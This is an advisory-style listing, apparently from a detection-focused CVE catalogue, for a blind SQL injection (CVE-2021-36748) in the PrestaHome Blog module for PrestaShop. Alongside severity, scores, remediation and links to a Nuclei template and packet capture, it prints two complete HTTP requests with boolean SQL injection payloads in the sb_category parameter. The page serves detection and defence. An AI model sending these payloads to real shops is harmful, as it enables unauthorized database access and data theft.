🔙 목록으로 돌아가기

CVE-2021-36748: PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection

TitlePrestaHome Blog for PrestaShop <1.7.8 - SQL Injection
Authorwhoever
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
RemediationUpgrade to PrestaShop version 1.7.8 or later, or apply the provided patch to fix the SQL Injection vulnerability.
CVSS Score7.5
EPSS Score0.83038
CVE IDCVE-2021-36748
CWE IDCWE-89
Tags cve2021 cve prestashop prestahome sqli cms vuln

🔍 Vulnerability Description

PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter.

🌐 HTTP Request

GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/10.0
Connection: close
Accept-Encoding: gzip
GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-36748.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-36748.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A